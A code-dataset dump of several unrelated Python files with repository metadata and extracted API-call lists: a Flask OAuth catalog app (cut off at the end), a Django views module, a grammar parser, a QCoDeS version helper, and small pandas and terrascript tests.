[((225, 254), 'sys.path.insert', 'sys.path.insert', (['(0)', 'PROJ_ROOT'], {}), '(0, PROJ_ROOT)\n', (240, 254), False, 'import sys\n'), ((142, 163), 'os.path.abspath', 'osp.abspath', (['__file__'], {}), '(__file__)\n', (153, 163), True, 'import os.path as osp\n'), ((190, 223), 'os.path.join', 'osp.join', (['cur_dir', '"""../../../../"""'], {}), "(cur_dir, '../../../../')\n", (198, 223), True, 'import os.path as osp\n'), ((1704, 1918), 'os.path.join', 'osp.join', (['PROJ_ROOT', '"""datasets/BOP_DATASETS/ycbv/test/init_poses/"""', '"""resnest50d_online_AugCosyAAEGray_mlBCE_DoubleMask_ycbv_pbr_100e_so_GdrnPbrPose_withYolov4PbrBbox_wDeepimPbrPose_ycbv_train_real_uw.json"""'], {}), "(PROJ_ROOT, 'datasets/BOP_DATASETS/ycbv/test/init_poses/',\n 'resnest50d_online_AugCosyAAEGray_mlBCE_DoubleMask_ycbv_pbr_100e_so_GdrnPbrPose_withYolov4PbrBbox_wDeepimPbrPose_ycbv_train_real_uw.json'\n )\n", (1712, 1918), True, 'import os.path as osp\n'), ((1948, 1972), 'os.path.exists', 'osp.exists', (['new_res_path'], {}), '(new_res_path)\n', (1958, 1972), True, 'import os.path as osp\n'), ((5898, 5941), 'lib.pysixd.inout.save_json', 'inout.save_json', (['new_res_path', 'new_res_dict'], {}), '(new_res_path, new_res_dict)\n', (5913, 5941), False, 'from lib.pysixd import inout, misc\n'), ((5946, 5954), 'lib.utils.utils.iprint', 'iprint', ([], {}), '()\n', (5952, 5954), False, 'from lib.utils.utils import iprint, wprint\n'), ((4843, 4872), 'os.path.join', 'osp.join', (['res_root', 'pred_name'], {}), '(res_root, pred_name)\n', (4851, 4872), True, 'import os.path as osp\n'), ((4888, 4909), 'os.path.exists', 'osp.exists', (['pred_path'], {}), '(pred_path)\n', (4898, 4909), True, 'import os.path as osp\n'), ((4929, 4956), 'lib.utils.utils.iprint', 'iprint', (['obj_name', 'pred_path'], {}), '(obj_name, pred_path)\n', (4935, 4956), False, 'from lib.utils.utils import iprint, wprint\n'), ((5020, 5040), 'mmcv.load', 'mmcv.load', (['pred_path'], {}), '(pred_path)\n', (5029, 5040), False, 'import mmcv\n'), ((5297, 5319), 'lib.utils.bbox_utils.xyxy_to_xywh', 'xyxy_to_xywh', (['bbox_est'], {}), '(bbox_est)\n', (5309, 5319), False, 'from lib.utils.bbox_utils import xyxy_to_xywh\n')]
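The conversion script above calls xyxy_to_xywh() on the detected boxes before writing bbox_est. That helper lives in lib.utils.bbox_utils and is not shown here; the sketch below uses the most common convention ([x1, y1, x2, y2] -> [x, y, width, height]) and is an assumption about its behaviour, not the repository's actual implementation.

import numpy as np

def xyxy_to_xywh_sketch(box):
    # Assumed convention: top-left corner plus width/height.
    x1, y1, x2, y2 = box
    return np.array([x1, y1, x2 - x1, y2 - y1])

print(xyxy_to_xywh_sketch(np.array([10.0, 20.0, 110.0, 220.0])))  # [ 10.  20. 100. 200.]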
jadbin/guniflask
tests/test_app/rest_app/rest_app/services/account_service.py
36253a962c056abf34884263c6919b02b921ad9c
from flask import abort from guniflask.context import service from ..config.jwt_config import jwt_manager @service class AccountService: accounts = { 'root': { 'authorities': ['role_admin'], 'password': '123456', } } def login(self, username: str, password: str): if username not in self.accounts or self.accounts[username]['password'] != password: return abort(403) account = self.accounts[username] token = jwt_manager.create_access_token(authorities=account['authorities'], username=username) return { 'username': username, 'access_token': token, } def get(self, username: str): if username not in self.accounts: return abort(404) return { 'username': username, 'authorities': self.accounts[username]['authorities'] }
[((432, 442), 'flask.abort', 'abort', (['(403)'], {}), '(403)\n', (437, 442), False, 'from flask import abort\n'), ((780, 790), 'flask.abort', 'abort', (['(404)'], {}), '(404)\n', (785, 790), False, 'from flask import abort\n')]
jhh67/chapel
test/library/draft/DataFrames/psahabu/AddSeries.py
f041470e9b88b5fc4914c75aa5a37efcb46aa08f
import pandas as pd

I = ["A", "B", "C", "D", "E"]
oneDigit = pd.Series([1, 2, 3, 4, 5], pd.Index(I))
twoDigit = pd.Series([10, 20, 30, 40, 50], pd.Index(I))

print("addends:")
print(oneDigit)
print(twoDigit)
print()

print("sum:")
print(oneDigit + twoDigit)
print()

I2 = ["A", "B", "C"]
I3 = ["B", "C", "D", "E"]
X = pd.Series([0, 1, 2], pd.Index(I2))
Y = pd.Series([10, 20, 0, 0], pd.Index(I3))

print("addends:")
print(X)
print(Y)
print()

print("sum:")
print(X + Y)
print()

A = pd.Series(["hello ", "my ", "name", "is", "brad"])
B = pd.Series(["world", "real"])

print("addends:")
print(A)
print(B)
print()

print("sum: ")
print(A + B)
[]
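The second and third cases in AddSeries.py above add Series whose indexes only partially overlap. A short follow-up sketch (not part of the Chapel test) shows the alignment rule pandas applies: labels present in only one operand yield NaN in the sum.

import pandas as pd

X = pd.Series([0, 1, 2], index=["A", "B", "C"])
Y = pd.Series([10, 20, 0, 0], index=["B", "C", "D", "E"])
print(X + Y)
# A     NaN
# B    11.0
# C    22.0
# D     NaN
# E     NaN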
shawcx/nelly
nelly/parser.py
8075b92e20064a117f9ab5a6d8ad261d21234111
#
# (c) 2008-2020 Matthew Shaw
#

import sys
import os
import re
import logging

import nelly

from .scanner import Scanner
from .program import Program
from .types import *


class Parser(object):
    def __init__(self, include_dirs=[]):
        self.include_dirs = include_dirs + [ os.path.join(nelly.root, 'grammars') ]
        self.pwd = []

        # setup the scanner based on the regular expressions
        self.scanner = Scanner(os.path.join(nelly.root, 'rules.lex'))

        # container for the compiled program
        self.program = Program()

        self.tokens_stack = []
        self.groups_stack = []
        self.group_stack = []
        self.groups = None
        self.group = None

    def Parse(self, grammarFile):
        grammar = grammarFile.read()
        self.pwd.append(os.path.dirname(grammarFile.name))

        logging.debug('Parsing %s (%d bytes)', grammarFile.name, len(grammar))

        self.tokens = self.scanner.Scan(grammar)
        # keep a reference to the tokens for when included files are parsed
        self.tokens_stack.append(self.tokens)

        # iterate over all the tokens
        while self.tokens:
            (token,value,line,col) = self.tokens.Next()

            # handle all the top-level tokens
            if 'nonterminal' == token:
                if value.startswith('::'):
                    value = value[2:]
                self._nonterminal(Types.NONTERMINAL, value)
            elif 'varterminal' == token:
                if value.startswith('::'):
                    value = value[2:]
                self._nonterminal(Types.VARTERMINAL, value)
            elif 'include' == token:
                self._include()
            elif 'start_python_code' == token:
                if r'<%pre' == value:
                    self.program.preamble.append(self._python_code('pre'))
                elif r'<%post' == value:
                    self.program.postscript.append(self._python_code('post'))
                else:
                    raise nelly.error('Please specify pre or post in code section')
            elif 'start_comment' == token:
                self._comment()
            else:
                raise nelly.error('Unhandled %s %s at %d:%d', token, repr(value), line, col)

        self.tokens_stack.pop()

        return self.program

    def _nonterminal(self, _type, name):
        # create a new container and add it to the program
        nonterminal = Nonterminal(_type, name)
        self.program.nonterminals[name] = nonterminal

        (token,value,line,col) = self.tokens.Next()

        # parse any optional arguments for the non-terminal
        if 'lparen' == token:
            while True:
                (token,value,line,col) = self.tokens.Next()
                if 'rparen' == token:
                    break
                elif 'comma' == token:
                    continue
                elif 'option' == token:
                    nonterminal.options.append(value)
                    if value == 'start':
                        self.program.start.append(name)
                elif 'decorator' == token:
                    nonterminal.decorators.append(value[1:])
                else:
                    raise nelly.error('Unknown option: %s %s', token, value)
            (token,value,line,col) = self.tokens.Next()

        if 'colon' != token:
            raise nelly.error('Parse error, missing colon at line %d, column %d', line, col)

        # parse zero or more expressions until a semicolon is found
        self._expressions('pipe', 'semicolon', nonterminal)

    def _expressions(self, delimiter, sentinel, nonterminal):
        (token,value,line,col) = self.tokens.Peek()
        expression = Expression((line,col))

        while self.tokens:
            (token,value,line,col) = self.tokens.Next()

            if sentinel == token:
                nonterminal.expressions.append(expression)
                break
            elif delimiter == token:
                nonterminal.expressions.append(expression)
                expression = Expression((line,col))
            elif 'lparen' == token:
                anonterminal = Nonterminal(Types.ANONYMOUS)
                expression.Statement(Types.ANONYMOUS, anonterminal)
                self._expressions('pipe', 'rparen', anonterminal)
            elif token in ['start_single_quote', 'start_double_quote', 'start_triple_quote']:
                quote = self._quote()
                expression.Statement(Types.TERMINAL, quote)
            elif token in ['start_single_bytes', 'start_double_bytes', 'start_triple_bytes']:
                byte_quote = self._quote()
                expression.Statement(Types.TERMINAL, byte_quote)
            elif 'nonterminal' == token:
                expression.Statement(Types.NONTERMINAL, value)
            elif 'varterminal' == token:
                expression.Statement(Types.VARTERMINAL, value)
            elif 'backref' == token:
                expression.Statement(Types.BACKREFERENCE, value)
            elif 'function' == token:
                functerminal = Nonterminal(Types.ANONYMOUS)
                self._expressions('comma', 'rparen', functerminal)
                expression.Statement(Types.FUNCTION, value[1:], functerminal)
            elif 'reference' == token:
                expression.Statement(Types.REFERENCE, value[1:])
            elif 'constant' == token:
                expression.Statement(Types.TERMINAL, value)
            elif 'start_python_code' == token:
                expression.code = self._python_code(nonterminal.name)
            elif 'lbracket' == token:
                try:
                    expression.Operation(Types.SLICE, self._slice())
                except IndexError:
                    raise nelly.error('Applying slice to nothing at line %d, column %d', line, col)
            elif 'lcurley' == token:
                try:
                    expression.Operation(Types.RANGE, self._range())
                except IndexError:
                    raise nelly.error('Applying range to nothing at line %d, column %d', line, col)
            elif 'langle' == token:
                expression.Weight(self._weight())
            elif 'empty' == token:
                pass
            else:
                raise nelly.error('Unhandled token "%s" at line %d, column %d', token, line, col)

    def _quote(self):
        # this will always be the quoted value
        (token,value,line,col) = self.tokens.Next()
        # this will always be the terminal quote
        self.tokens.Next()
        return value

    #
    # Slice a string
    #
    def _slice(self):
        front = None
        back = None
        start = False

        (token,value,line,col) = self.tokens.Next()
        if 'constant' == token:
            front = value
            start = True
            (token,value,line,col) = self.tokens.Next()

        if 'rbracket' == token:
            if False == start:
                raise nelly.error('Empty slice at line %d, column %d', line, col)
            return (front,front+1)
        elif 'colon' != token:
            raise nelly.error('Missing colon at line %d, column %d', line, col)

        (token,value,line,col) = self.tokens.Next()
        if 'constant' == token:
            back = value
            (token,value,line,col) = self.tokens.Next()
        elif 'rbracket' != token:
            raise nelly.error('Missing ] at line %d, column %d', line, col)

        return (front,back)

    #
    # Repeat a range
    #
    def _range(self):
        lower = 0
        upper = 0

        (token,value,line,col) = self.tokens.Next()
        if 'constant' != token:
            raise nelly.error('Missing range at line %d, column %d', line, col)
        lower = value
        upper = value

        (token,value,line,col) = self.tokens.Next()
        if 'rcurley' == token:
            return (lower,upper)
        elif 'comma' != token:
            raise nelly.error('Missing comma at line %d, column %d', line, col)

        (token,value,line,col) = self.tokens.Next()
        if 'constant' == token:
            upper = value
        else:
            raise nelly.error('Missing range at line %d, column %d', line, col)

        (token,value,line,col) = self.tokens.Next()
        if 'rcurley' != token:
            raise nelly.error('Missing } at line %d, column %d', line, col)

        if lower > upper:
            lower,upper = upper,lower

        return (lower,upper)

    def _weight(self):
        (token,value,line,col) = self.tokens.Next()
        if 'constant' != token:
            raise nelly.error('Missing weight at line %d, column %d', line, col)
        (token,ignore,line,col) = self.tokens.Next()
        if 'rangle' != token:
            raise nelly.error('Missing > at %d, column %d', line, col)
        return value

    #
    # Compile the Python into a code object
    #
    def _python_code(self, name):
        (token,value,line,col) = self.tokens.Next()

        values = [s for s in value.split('\n') if s.strip()] or ['']
        # save the whitepsace of the first line
        ws = re.compile(r'\s*').match(values[0]).group()
        # check indentation
        if [s for s in values if not s.startswith(ws)]:
            raise nelly.error('Bad indentation in code block at line %d, column %d', line, col)
        # strip and rejoin the code
        codeblock = '\n'.join(s[len(ws):] for s in values)

        # eat the end_python_code token
        self.tokens.Next()

        try:
            return compile(codeblock, '<'+name+'>', 'exec')
        except SyntaxError as e:
            raise nelly.error('%d: %s: %s', e.lineno, e.msg, repr(e.text))

    #
    # Include other BNF files
    #
    def _include(self):
        (token,value,line,col) = self.tokens.Next()
        # file names are quoted
        if token not in ['start_single_quote', 'start_double_quote', 'start_triple_quote']:
            raise nelly.error('quoted file path expected')
        # get the quoted value
        path = self._quote()

        # try opening the file in each include directory, ignore errors
        content = None
        for include_dir in self.pwd[-1:] + self.include_dirs:
            try:
                fullpath = os.path.join(include_dir, path)
                content = open(fullpath, 'r')
                logging.debug('Including file %s', repr(fullpath))
                break
            except:
                continue

        # if no file was found, throw an error
        if None == content:
            raise nelly.error('Could not load file %s', repr(path))

        # ignore empty file
        if not content:
            return

        # compile it inline
        self.Parse(content)
        self.pwd.pop()

        # restore the current tokens
        self.tokens = self.tokens_stack[-1]

    #
    # Multi-line comments
    #
    def _comment(self):
        # consume and disregard the tokens
        while True:
            (token,value,line,col) = self.tokens.Next()
            if 'start_comment' == token:
                self._comment()
            if 'end_comment' == token:
                return
[((440, 477), 'os.path.join', 'os.path.join', (['nelly.root', '"""rules.lex"""'], {}), "(nelly.root, 'rules.lex')\n", (452, 477), False, 'import os\n'), ((804, 837), 'os.path.dirname', 'os.path.dirname', (['grammarFile.name'], {}), '(grammarFile.name)\n', (819, 837), False, 'import os\n'), ((3384, 3458), 'nelly.error', 'nelly.error', (['"""Parse error, missing colon at line %d, column %d"""', 'line', 'col'], {}), "('Parse error, missing colon at line %d, column %d', line, col)\n", (3395, 3458), False, 'import nelly\n'), ((7698, 7759), 'nelly.error', 'nelly.error', (['"""Missing range at line %d, column %d"""', 'line', 'col'], {}), "('Missing range at line %d, column %d', line, col)\n", (7709, 7759), False, 'import nelly\n'), ((8176, 8237), 'nelly.error', 'nelly.error', (['"""Missing range at line %d, column %d"""', 'line', 'col'], {}), "('Missing range at line %d, column %d', line, col)\n", (8187, 8237), False, 'import nelly\n'), ((8340, 8397), 'nelly.error', 'nelly.error', (['"""Missing } at line %d, column %d"""', 'line', 'col'], {}), "('Missing } at line %d, column %d', line, col)\n", (8351, 8397), False, 'import nelly\n'), ((8619, 8681), 'nelly.error', 'nelly.error', (['"""Missing weight at line %d, column %d"""', 'line', 'col'], {}), "('Missing weight at line %d, column %d', line, col)\n", (8630, 8681), False, 'import nelly\n'), ((8783, 8835), 'nelly.error', 'nelly.error', (['"""Missing > at %d, column %d"""', 'line', 'col'], {}), "('Missing > at %d, column %d', line, col)\n", (8794, 8835), False, 'import nelly\n'), ((9279, 9356), 'nelly.error', 'nelly.error', (['"""Bad indentation in code block at line %d, column %d"""', 'line', 'col'], {}), "('Bad indentation in code block at line %d, column %d', line, col)\n", (9290, 9356), False, 'import nelly\n'), ((9965, 10005), 'nelly.error', 'nelly.error', (['"""quoted file path expected"""'], {}), "('quoted file path expected')\n", (9976, 10005), False, 'import nelly\n'), ((286, 322), 'os.path.join', 'os.path.join', (['nelly.root', '"""grammars"""'], {}), "(nelly.root, 'grammars')\n", (298, 322), False, 'import os\n'), ((6991, 7050), 'nelly.error', 'nelly.error', (['"""Empty slice at line %d, column %d"""', 'line', 'col'], {}), "('Empty slice at line %d, column %d', line, col)\n", (7002, 7050), False, 'import nelly\n'), ((7136, 7197), 'nelly.error', 'nelly.error', (['"""Missing colon at line %d, column %d"""', 'line', 'col'], {}), "('Missing colon at line %d, column %d', line, col)\n", (7147, 7197), False, 'import nelly\n'), ((7416, 7473), 'nelly.error', 'nelly.error', (['"""Missing ] at line %d, column %d"""', 'line', 'col'], {}), "('Missing ] at line %d, column %d', line, col)\n", (7427, 7473), False, 'import nelly\n'), ((7971, 8032), 'nelly.error', 'nelly.error', (['"""Missing comma at line %d, column %d"""', 'line', 'col'], {}), "('Missing comma at line %d, column %d', line, col)\n", (7982, 8032), False, 'import nelly\n'), ((10269, 10300), 'os.path.join', 'os.path.join', (['include_dir', 'path'], {}), '(include_dir, path)\n', (10281, 10300), False, 'import os\n'), ((9132, 9150), 're.compile', 're.compile', (['"""\\\\s*"""'], {}), "('\\\\s*')\n", (9142, 9150), False, 'import re\n'), ((3229, 3279), 'nelly.error', 'nelly.error', (['"""Unknown option: %s %s"""', 'token', 'value'], {}), "('Unknown option: %s %s', token, value)\n", (3240, 3279), False, 'import nelly\n'), ((2019, 2076), 'nelly.error', 'nelly.error', (['"""Please specify pre or post in code section"""'], {}), "('Please specify pre or post in code section')\n", (2030, 2076), 
False, 'import nelly\n'), ((5780, 5853), 'nelly.error', 'nelly.error', (['"""Applying slice to nothing at line %d, column %d"""', 'line', 'col'], {}), "('Applying slice to nothing at line %d, column %d', line, col)\n", (5791, 5853), False, 'import nelly\n'), ((6042, 6115), 'nelly.error', 'nelly.error', (['"""Applying range to nothing at line %d, column %d"""', 'line', 'col'], {}), "('Applying range to nothing at line %d, column %d', line, col)\n", (6053, 6115), False, 'import nelly\n'), ((6298, 6373), 'nelly.error', 'nelly.error', (['"""Unhandled token "%s" at line %d, column %d"""', 'token', 'line', 'col'], {}), '(\'Unhandled token "%s" at line %d, column %d\', token, line, col)\n', (6309, 6373), False, 'import nelly\n')]
zhinst/Qcodes
qcodes/utils/installation_info.py
d95798bd08d57bb8cddd460fdb4a5ff25f19215c
"""
This module contains helper functions that provide information about how
QCoDeS is installed and about what other packages are installed along with
QCoDeS
"""
import sys
from typing import Dict, List, Optional
import subprocess
import json
import logging

import requirements

if sys.version_info >= (3, 8):
    from importlib.metadata import distribution, version, PackageNotFoundError
else:
    # 3.7 and earlier
    from importlib_metadata import distribution, version, PackageNotFoundError

import qcodes

log = logging.getLogger(__name__)


def is_qcodes_installed_editably() -> Optional[bool]:
    """
    Try to ask pip whether QCoDeS is installed in editable mode and return
    the answer a boolean. Returns None if pip somehow did not respond as
    expected.
    """
    answer: Optional[bool]

    try:
        pipproc = subprocess.run(['python', '-m', 'pip', 'list', '-e', '--no-index',
                                 '--format=json'],
                                check=True,
                                stdout=subprocess.PIPE)
        e_pkgs = json.loads(pipproc.stdout.decode('utf-8'))
        answer = any([d["name"] == 'qcodes' for d in e_pkgs])
    except Exception as e:  # we actually do want a catch-all here
        log.warning(f'{type(e)}: {str(e)}')
        answer = None

    return answer


def get_qcodes_version() -> str:
    """
    Get the version of the currently installed QCoDeS
    """
    return qcodes.version.__version__


def get_qcodes_requirements() -> List[str]:
    """
    Return a list of the names of the packages that QCoDeS requires
    """
    qc_pkg = distribution('qcodes').requires
    if qc_pkg is None:
        return []
    package_names = [list(requirements.parse(req))[0].name for req in qc_pkg]

    return package_names


def get_qcodes_requirements_versions() -> Dict[str, str]:
    """
    Return a dictionary of the currently installed versions of the packages
    that QCoDeS requires. The dict maps package name to version string.
    If an (optional) dependency is not installed the name maps to
    "Not installed".
    """
    req_names = get_qcodes_requirements()

    req_versions = {}

    for req in req_names:
        try:
            req_versions[req] = version(req)
        except PackageNotFoundError:
            req_versions[req] = "Not installed"

    return req_versions
[((519, 546), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (536, 546), False, 'import logging\n'), ((837, 961), 'subprocess.run', 'subprocess.run', (["['python', '-m', 'pip', 'list', '-e', '--no-index', '--format=json']"], {'check': '(True)', 'stdout': 'subprocess.PIPE'}), "(['python', '-m', 'pip', 'list', '-e', '--no-index',\n '--format=json'], check=True, stdout=subprocess.PIPE)\n", (851, 961), False, 'import subprocess\n'), ((1618, 1640), 'importlib_metadata.distribution', 'distribution', (['"""qcodes"""'], {}), "('qcodes')\n", (1630, 1640), False, 'from importlib_metadata import distribution, version, PackageNotFoundError\n'), ((2240, 2252), 'importlib_metadata.version', 'version', (['req'], {}), '(req)\n', (2247, 2252), False, 'from importlib_metadata import distribution, version, PackageNotFoundError\n'), ((1717, 1740), 'requirements.parse', 'requirements.parse', (['req'], {}), '(req)\n', (1735, 1740), False, 'import requirements\n')]
brandonrobertz/foia-pdf-processing-system
documents/views.py
025516b5e2234df16741237c4208cd484f577370
from django.shortcuts import render
from django.http import JsonResponse

from .models import FieldCategory


def fieldname_values(request):
    if request.method == "GET":
        fieldname = request.GET['fieldname']
        query = request.GET.get('q')
        q_kwargs = dict(
            fieldname=fieldname,
        )
        if query:
            q_kwargs['value__icontains'] = query
        fc = FieldCategory.objects.filter(
            **q_kwargs
        ).order_by("-count").values('value')
        return JsonResponse(list(fc), safe=False)
    elif request.method == "POST":
        fieldname = request.POST['fieldname']
        value = request.POST['value']
        fc, created = FieldCategory.objects.get_or_create(
            fieldname=fieldname,
            value=value
        )
        return JsonResponse({'status': 'ok'})


def fieldname_value_count(request):
    # just let it explode if people don't POST properly
    fieldname = request.POST['fieldname']
    value = request.POST['value']
    fc = FieldCategory.objects.get(
        fieldname=fieldname,
        value=value
    )
    fc.count += 1
    fc.save()
    return JsonResponse({'status': 'ok'})
[((1146, 1176), 'django.http.JsonResponse', 'JsonResponse', (["{'status': 'ok'}"], {}), "({'status': 'ok'})\n", (1158, 1176), False, 'from django.http import JsonResponse\n'), ((811, 841), 'django.http.JsonResponse', 'JsonResponse', (["{'status': 'ok'}"], {}), "({'status': 'ok'})\n", (823, 841), False, 'from django.http import JsonResponse\n')]
mjuenema/python-terrascript
tests/test_provider_Mongey_kafka_connect.py
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
# tests/test_provider_Mongey_kafka-connect.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:20:11 UTC)


def test_provider_import():
    import terrascript.provider.Mongey.kafka_connect


def test_resource_import():
    from terrascript.resource.Mongey.kafka_connect import kafka_connect_connector


# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
#    import terrascript.provider.Mongey.kafka_connect
#
#    t = terrascript.provider.Mongey.kafka_connect.kafka_connect()
#    s = str(t)
#
#    assert 'https://github.com/Mongey/terraform-provider-kafka-connect' in s
#    assert '0.2.3' in s
[]
nicholsont/catalog_app
application.py
011e4c35401aa1128a4cf1ca99dd808da7a759e6
from flask import Flask, render_template, request, redirect, jsonify, g
from flask import url_for, flash, make_response
from flask import session as login_session
from sqlalchemy import create_engine, asc
from sqlalchemy.orm import sessionmaker
from models import Base, Category, Item, User
from oauth2client.client import flow_from_clientsecrets
from oauth2client.client import FlowExchangeError
import httplib2
import json
import requests

app = Flask(__name__)

# Retrieves client ID's and secrets from the json files
CLIENT_ID = json.loads(open('client_secrets.json', 'r')
                       .read())['web']['client_id']
APP_ID = json.loads(open('fb_client_secrets.json', 'r')
                    .read())['web']['app_id']
APP_SECRET = json.loads(open('fb_client_secrets.json', 'r')
                        .read())['web']['app_secret']

# Connect to Database and create database session
engine = create_engine('sqlite:///catalog.db')
Base.metadata.bind = engine

DBSession = sessionmaker(bind=engine)
session = DBSession()


# Login handler
@app.route('/login')
def showLogin():
    """JSON API to view entire catalog Information."""
    return render_template('login.html')


# Third Party Oauth callback
@app.route('/oauth/<provider>', methods=['POST'])
def oauthLogin(provider):
    """
    Retrieves provider to process oauth login.
    params:(string) oauth provider
    """
    if provider == 'google':
        code = request.data
        try:
            # Upgrade auth code into credentials object
            oauth_flow = flow_from_clientsecrets('client_secrets.json', scope='')
            oauth_flow.redirect_uri = 'postmessage'
            credentials = oauth_flow.step2_exchange(code)
        except FlowExchangeError:
            response = make_response(
                json.dumps('Failed to upgrade the authorization code.'), 401)
            response.headers['Content-Type'] = 'application/json'
            return response

        # Check for valid access token
        access_token = credentials.access_token
        url = 'https://www.googleapis.com/oauth2/v1/tokeninfo?' \
              'access_token={}'.format(access_token)
        h = httplib2.Http()
        result = json.loads(h.request(url, 'GET')[1])

        # Access token error handling
        if result.get('error') is not None:
            response = make_response(json.dumps(result.get('error')), 500)
            response.headers['Content-Type'] = ' application/json'
            return response

        # Store access token in session
        login_session['provider'] = 'google'
        login_session['access_token'] = access_token
        login_session['gplus_id'] = credentials.id_token['sub']

        # Get user info
        userinfo_url = 'https://www.googleapis.com/oauth2/v1/userinfo'
        params = {'access_token': login_session['access_token'], 'alt': 'json'}
        answer = requests.get(userinfo_url, params=params)
        data = json.loads(answer.text)

        login_session['username'] = data['name']
        login_session['picture'] = data['picture']
        login_session['email'] = data['email']
    elif provider == 'facebook':
        access_token = request.data
        url = 'https://graph.facebook.com/oauth/access_token?grant_type=' \
              'fb_exchange_token&client_id={}&client_secret={}&' \
              'fb_exchange_token={}'.format(APP_ID, APP_SECRET, access_token)  # noqa
        h = httplib2.Http()
        result = json.loads(h.request(url, 'GET')[1])

        # Strip expire tag from access token
        access_token = result['access_token']

        url = 'https://graph.facebook.com/v2.11/me?access_token={}&fields=' \
              'name,id,email,picture'.format(access_token)  # noqa
        h = httplib2.Http()
        result = json.loads(h.request(url, 'GET')[1])

        # Get user info
        data = result
        login_session['access_token'] = access_token
        login_session['provider'] = 'facebook'
        login_session['username'] = data['name']
        login_session['email'] = data['email']
        login_session['picture'] = data['picture']['data']['url']
        login_session['facebook_id'] = data['id']

    # Checks if user exists in DB
    if getUserID(login_session['email']) is not None:
        login_session['user_id'] = getUserID(login_session['email'])
    else:
        createUser(login_session)
        login_session['user_id'] = getUserID(login_session['email'])

    # Stores token in session
    user = session.query(User).filter_by(email=login_session['email']).first()
    token = user.generate_auth_token(600)
    login_session['token'] = token

    output = ''
    output += '<h1>Welcome, {}!</h1>'.format(login_session['username'])
    output += '<img src="{}" '.format(login_session['picture'])
    output += 'style = "width: 300px; height: 300px; border-radius: 150px;' \
              '-webkit-border-radius: 150px;-moz-border-radius: 150px;">'
    flash('Now logged in as {}'.format(login_session['username']))
    return output


def createUser(login_session):
    newUser = User(username=login_session['username'],
                   email=login_session['email'],
                   picture=login_session['picture'])
    session.add(newUser)
    session.commit()


def getUserID(email):
    try:
        user = session.query(User).filter_by(email=email).one()
        return user.id
    except:
        return None


# Revoke current user's token and reset login_session
@app.route('/logout')
def logout():
    if 'provider' in login_session:
        if login_session['provider'] == 'google':
            del login_session['gplus_id']
        if login_session['provider'] == 'facebook':
            del login_session['facebook_id']
        del login_session['access_token']
        del login_session['username']
        del login_session['picture']
        del login_session['email']
        del login_session['token']
        flash("You have been successfully logged out.")
        return redirect(url_for('showCatalog'))
    else:
        flash("No user has been logged in.")
        return redirect(url_for('showCatalog'))


# JSON APIs to view Category Information.
@app.route('/catalog/JSON')
def catalogJSON():
    categories = session.query(Category).all()
    items = session.query(Item).order_by(Item.category_id).limit(3)
    return jsonify(Categories=[c.serialize for c in categories],
                   Items=[i.serialize for i in items])


@app.route('/catalog/<category>/JSON')
def catalogCategoryJSON(category):
    itemCategory = session.query(Category).filter_by(name=category).first()
    items = session.query(Item).filter_by(category_id=itemCategory.id).all()
    return jsonify(Categories=[itemCategory.serialize],
                   Items=[i.serialize for i in items])


@app.route('/catalog/<category>/<item>/JSON')
def categoryItemJSON(category, item):
    itemCategory = session.query(Category).filter_by(name=category).first()
    item = session.query(Item).filter_by(name=item,
                                         category_id=itemCategory.id).first()
    return jsonify(Category=[itemCategory.serialize], Item=[item.serialize])


# Show all Categories and the latest items
@app.route('/')
@app.route('/catalog')
def showCatalog():
    categories = session.query(Category).all()
    items = session.query(Item).order_by(Item.category_id).limit(3)
    if 'token' not in login_session:
        return render_template('publiccatalog.html', categories=categories,
                               items=items)
    else:
        return render_template('catalog.html', categories=categories,
                               items=items)


# Show Items in a category item
@app.route('/catalog/<category>/')
def showCatalogCategory(category):
    itemCategory = session.query(Category).filter_by(name=category).first()
    items = session.query(Item).filter_by(category_id=itemCategory.id).all()
    categories = session.query(Category).all()
    if 'token' not in login_session:
        return render_template('publiccategory.html', items=items,
                               category=itemCategory, categories=categories)
    else:
        return render_template('category.html', items=items,
                               category=itemCategory, categories=categories)


# Show an item in a category
@app.route('/catalog/<category>/<item>/')
def showCategoryItem(category, item):
    category = session.query(Category).filter_by(name=category).first()
    item = session.query(Item).filter_by(name=item,
                                         category_id=category.id).first()
    categories = session.query(Category).all()
    if 'token' not in login_session:
        return render_template('publiccategoryitem.html', item=item,
                               category=category, categories=categories)
    return render_template('categoryitem.html', item=item, category=category,
                           categories=categories)


# Create a new item
@app.route('/catalog/category/new/', methods=['GET', 'POST'])
def newCategoryItem():
    if 'token' not in login_session:
        return redirect('/login')
    categories = session.query(Category).all()
    user = session.query(User).filter_by(email=login_session['email']).one()
    if request.method == 'POST':
        category = session.query(Category).filter_by(
            name=request.form['category']).first()
        newItem = Item(name=request.form['name'],
                       description=request.form['description'],
                       category_id=category.id, user_id=user.id)
        session.add(newItem)
        session.commit()
        flash('New Item {} Successfully Added'.format(newItem.name))
        return redirect(url_for('showCatalog'))
    else:
        return render_template('newcategoryitem.html', categories=categories)


# Edit a category item
@app.route('/catalog/<category>/<item>/edit', methods=['GET', 'POST'])
def editCategoryItem(category, item):
    if 'token' not in login_session:
        return redirect('/login')
    user = session.query(User).filter_by(email=login_session['email']).first()
    categoryItem = session.query(Category).filter_by(name=category).first()
    editedItem = session.query(Item).filter_by(
        name=item, category_id=categoryItem.id).first()
    categories = session.query(Category).all()
    if user.id != editedItem.user_id:
        flash('You are not authorized to edit {}.'.format(item))
        return redirect(url_for('showCategoryItem', category=categoryItem.name,
                                item=editedItem.name))
    if request.method == 'POST':
        if request.form['name']:
            editedItem.name = request.form['name']
        if request.form['description']:
            editedItem.description = request.form['description']
        if request.form['category']:
            category = session.query(Category).filter_by(
                name=request.form['category']).first()
            editedItem.category_id = category.id
        session.add(editedItem)
        session.commit()
        flash('Item Successfully Edited')
        return redirect(url_for('showCategoryItem',
                                category=request.form['category'],
                                item=editedItem.name))
    else:
        return render_template('editcategoryitem.html',
                               category=categoryItem.name,
                               item=editedItem.name,
                               categories=categories,
                               editedItem=editedItem)


# Delete a category item
@app.route('/catalog/<category>/<item>/delete', methods=['GET', 'POST'])
def deleteCategoryItem(category, item):
    if 'token' not in login_session:
        return redirect('/login')
    user = session.query(User).filter_by(email=login_session['email']).first()
    categoryItem = session.query(Category).filter_by(name=category).first()
    itemToDelete = session.query(Item).filter_by(
        name=item, category_id=categoryItem.id).first()
    if user.id != itemToDelete.user_id:
        flash('You are not authorized to delete {}.'.format(item))
